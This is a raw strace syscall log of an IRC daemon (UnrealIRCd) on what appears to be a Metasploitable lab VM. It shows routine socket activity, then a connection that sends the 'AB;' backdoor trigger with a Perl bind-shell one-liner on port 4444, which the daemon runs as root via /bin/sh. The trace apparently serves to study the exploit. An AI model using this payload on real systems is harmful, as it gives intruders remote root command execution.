4519  20:27:57.071564 select(1024, [2 3 4 7 9], [], NULL, {0, 960000}) = 1 (in [9], left {0, 660000})
4519  20:27:57.371187 clock_gettime(CLOCK_MONOTONIC, {48887, 188229004}) = 0
4519  20:27:57.371260 recv(9, "PRIVMSG  #testit2 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:27:57.371313 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371346 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371371 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371387 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371401 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371415 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371429 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371443 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371456 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371471 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371484 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371498 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371512 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371525 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371539 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371552 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371566 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371580 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371593 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371607 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371621 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371634 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.371699 gettimeofday({1495672077, 371704}, NULL) = 0
4519  20:27:57.371712 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 820000})
4519  20:27:57.551144 clock_gettime(CLOCK_MONOTONIC, {48887, 368189284}) = 0
4519  20:27:57.551228 recv(4, "PRIVMSG  #testit0 BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 59
4519  20:27:57.551279 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551312 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551339 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551358 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551372 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551386 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551400 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551413 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551427 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551440 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551454 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551468 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551481 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551502 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551516 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551530 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551544 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551557 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551571 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551585 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551598 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551612 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.551628 time(NULL)        = 1495672077
4519  20:27:57.551646 time(NULL)        = 1495672077
4519  20:27:57.551664 gettimeofday({1495672077, 551669}, NULL) = 0
4519  20:27:57.551677 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:27:57.551706 clock_gettime(CLOCK_MONOTONIC, {48887, 368719266}) = 0
4519  20:27:57.551717 gettimeofday({1495672077, 551720}, NULL) = 0
4519  20:27:57.551727 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 600000})
4519  20:27:57.961064 clock_gettime(CLOCK_MONOTONIC, {48887, 778158397}) = 0
4519  20:27:57.961241 accept(2, 0, NULL) = 5
4519  20:27:57.961312 getpeername(5, {sa_family=AF_INET, sin_port=htons(34945), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0
4519  20:27:57.961371 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:27:57.961400 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:27:57.961425 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0
4519  20:27:57.961442 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0
4519  20:27:57.961454 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0
4519  20:27:57.961466 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0
4519  20:27:57.961478 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0
4519  20:27:57.961494 clock_gettime(CLOCK_MONOTONIC, {48887, 778507552}) = 0
4519  20:27:57.961506 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6
4519  20:27:57.961518 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)
4519  20:27:57.961528 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0
4519  20:27:57.961537 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0
4519  20:27:57.961547 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0
4519  20:27:57.961563 send(6, "&A\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39
4519  20:27:57.961625 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)
4519  20:27:57.961649 gettimeofday({1495672077, 961653}, NULL) = 0
4519  20:27:57.961661 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 990000})
4519  20:27:57.970728 clock_gettime(CLOCK_MONOTONIC, {48887, 787736822}) = 0
4519  20:27:57.970728 recv(4, "PRIVMSG  #testit0 ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 45
4519  20:27:57.970728 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970728 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970729 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970729 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970729 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970729 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970729 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970730 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970730 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970741 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970763 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970777 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970791 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970804 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970818 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970832 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970845 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970859 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970873 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970887 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970911 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970926 getrusage(RUSAGE_SELF, {ru_utime={0, 160000}, ru_stime={3, 150000}, ...}) = 0
4519  20:27:57.970943 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70
4519  20:27:57.971005 time(NULL)        = 1495672077
4519  20:27:57.971017 time(NULL)        = 1495672077
4519  20:27:57.971028 gettimeofday({1495672077, 971031}, NULL) = 0
4519  20:27:57.971039 select(1024, [2 6], [], NULL, {0, 0}) = 0 (Timeout)
4519  20:27:57.971069 clock_gettime(CLOCK_MONOTONIC, {48887, 788081738}) = 0
4519  20:27:57.971079 gettimeofday({1495672077, 971083}, NULL) = 0
4519  20:27:57.971090 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 940000})
4519  20:27:58.030658 clock_gettime(CLOCK_MONOTONIC, {48887, 847667157}) = 0
4519  20:27:58.030658 recvfrom(6, "&A\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\1,\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116
4519  20:27:58.030658 close(6)          = 0
4519  20:27:58.030659 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)
4519  20:27:58.030659 gettimeofday({1495672078, 30659}, NULL) = 0
4519  20:27:58.030661 select(1024, [2 3 4 5 7 9], [5], NULL, {1, 0}) = 2 (in [5], out [5], left {1, 0})
4519  20:27:58.030711 clock_gettime(CLOCK_MONOTONIC, {48887, 847723999}) = 0
4519  20:27:58.030723 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104
4519  20:27:58.030787 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244
4519  20:27:58.030836 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0
4519  20:27:58.030882 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
4519  20:27:58.030894 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
4519  20:27:58.030909 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12543
12543 20:27:58.030992 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0
12543 20:27:58.031006 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0
12543 20:27:58.031017 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12543 20:27:58.031030 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0
12543 20:27:58.031138 brk(0)            = 0x80f9000
12543 20:27:58.031160 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.031183 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f36000
12543 20:27:58.031200 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.031217 open("/etc/ld.so.cache", O_RDONLY) = 1
12543 20:27:58.031230 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12543 20:27:58.031248 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f2e000
12543 20:27:58.031259 close(1)          = 0
12543 20:27:58.031269 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.031284 open("/lib/libncurses.so.5", O_RDONLY) = 1
12543 20:27:58.031297 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512
12543 20:27:58.031391 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0
12543 20:27:58.040504 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7efe000
12543 20:27:58.040520 mmap2(0xb7f2b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f2b000
12543 20:27:58.040542 close(1)          = 0
12543 20:27:58.040568 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.050689 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
12543 20:27:58.050689 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
12543 20:27:58.050689 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
12543 20:27:58.050690 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7efa000
12543 20:27:58.050690 mmap2(0xb7efc000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7efc000
12543 20:27:58.050690 close(1)          = 0
12543 20:27:58.050690 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12543 20:27:58.050700 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
12543 20:27:58.050715 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
12543 20:27:58.050810 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
12543 20:27:58.050828 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef9000
12543 20:27:58.050843 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7daa000
12543 20:27:58.050854 mmap2(0xb7ef3000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ef3000
12543 20:27:58.050869 mmap2(0xb7ef6000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef6000
12543 20:27:58.050884 close(1)          = 0
12543 20:27:58.050919 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da9000
12543 20:27:58.050934 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da96b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
12543 20:27:58.050990 mprotect(0xb7ef3000, 4096, PROT_READ) = 0
12543 20:27:58.051029 munmap(0xb7f2e000, 29913) = 0
12543 20:27:58.051056 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.051070 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
12543 20:27:58.051091 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfdd6f90) = -1 ENOTTY (Inappropriate ioctl for device)
12543 20:27:58.051123 brk(0)            = 0x80f9000
12543 20:27:58.051133 brk(0x80fa000)    = 0x80fa000
12543 20:27:58.051145 brk(0x80fb000)    = 0x80fb000
12543 20:27:58.051162 getuid32()        = 0
12543 20:27:58.051172 getgid32()        = 0
12543 20:27:58.051181 geteuid32()       = 0
12543 20:27:58.051190 getegid32()       = 0
12543 20:27:58.051204 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.051217 time(NULL)        = 1495672078
12543 20:27:58.051230 brk(0x80fc000)    = 0x80fc000
12543 20:27:58.051245 brk(0x80fd000)    = 0x80fd000
12543 20:27:58.051266 open("/proc/meminfo", O_RDONLY) = 1
12543 20:27:58.051288 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
12543 20:27:58.051306 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f35000
12543 20:27:58.051318 read(1, "MemTotal:      1035240 kB\nMemFree:        149444 kB\nBuffers:        141760 kB\nCached:         500608 kB\nSwapCached:          0 kB\nActive:         525168 kB\nInactive:       306076 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        149196 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            1872 kB\nWriteback:           0 kB\nAnonPages:      188908 kB\nMapped:          52016 kB\nSlab:            32776 kB\nSReclaimable:    20296 kB\nSUnreclaim:      12480 kB\nPageTables:       2900 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707968 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
12543 20:27:58.051423 close(1)          = 0
12543 20:27:58.051436 munmap(0xb7f35000, 4096) = 0
12543 20:27:58.051448 brk(0x80fe000)    = 0x80fe000
12543 20:27:58.051475 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12543 20:27:58.051489 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12543 20:27:58.051501 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12543 20:27:58.051513 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12543 20:27:58.051525 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
12543 20:27:58.051538 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
12543 20:27:58.051551 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12543 20:27:58.051563 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12543 20:27:58.051577 uname({sys="Linux", node="metasploitable", ...}) = 0
12543 20:27:58.051626 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
12543 20:27:58.051645 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12543 20:27:58.051663 brk(0x8100000)    = 0x8100000
12543 20:27:58.051676 getcwd("/etc/unreal", 4096) = 12
12543 20:27:58.051690 getpid()          = 12543
12543 20:27:58.051707 getppid()         = 4519
12543 20:27:58.051723 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12543 20:27:58.051744 stat64("/sbin/sh", 0xbfdd6f68) = -1 ENOENT (No such file or directory)
12543 20:27:58.051757 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12543 20:27:58.051774 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12543 20:27:58.051799 socket(PF_FILE, SOCK_STREAM, 0) = 1
12543 20:27:58.051812 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12543 20:27:58.051824 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12543 20:27:58.051846 close(1)          = 0
12543 20:27:58.051858 socket(PF_FILE, SOCK_STREAM, 0) = 1
12543 20:27:58.051868 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12543 20:27:58.051878 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12543 20:27:58.051897 close(1)          = 0
